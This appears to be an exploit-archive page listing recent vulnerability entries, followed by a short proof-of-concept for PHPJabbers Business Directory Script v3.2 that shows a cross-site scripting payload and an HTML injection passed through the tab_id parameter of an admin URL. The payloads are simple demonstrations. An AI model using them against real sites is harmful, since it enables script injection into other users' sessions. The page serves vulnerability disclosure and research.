
17 changes to exploits/shellcodes/ghdb EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) EuroTel ETL3100 - Transmitter Default Credentials EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download Color Prediction Game v1.0 - SQL Injection Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) Dolibarr Version 17.0.1 - Stored XSS Global - Multi School Management System Express v1.0- SQL Injection OVOO Movie Portal CMS v3.3.3 - SQL Injection PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities Taskhub CRM Tool 2.8.6 - SQL Injection Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions TSPlus 16.0.0.0 - Remote Work Insecure Credential storage TSplus 16.0.0.0 - Remote Work Insecure Files and Folders TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
31 lines
No EOL
969 B
Text
31 lines
No EOL
969 B
Text
# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
|
|
# Date: 09/08/2023
|
|
# Exploit Author: Kerimcan Ozturk
|
|
# Vendor Homepage: https://www.phpjabbers.com/
|
|
# Software Link: https://www.phpjabbers.com/business-directory-script/
|
|
# Version: 3.2
|
|
# Tested on: Windows 10 Pro
|
|
## Description
|
|
|
|
Technical Detail / POC
|
|
==========================
|
|
Login Account
|
|
Go to Property Page (
|
|
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
|
|
Edit Any Property (
|
|
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57
|
|
)
|
|
|
|
[1] Cross-Site Scripting (XSS)
|
|
|
|
Request:
|
|
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
|
|
"<script><image/src/onerror=prompt(8)>
|
|
|
|
[2] Cross-Site Request Forgery
|
|
|
|
Request:
|
|
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
|
|
"<script><font%20color="green">Kerimcan%20Ozturk</font>
|
|
|
|
Best Regards |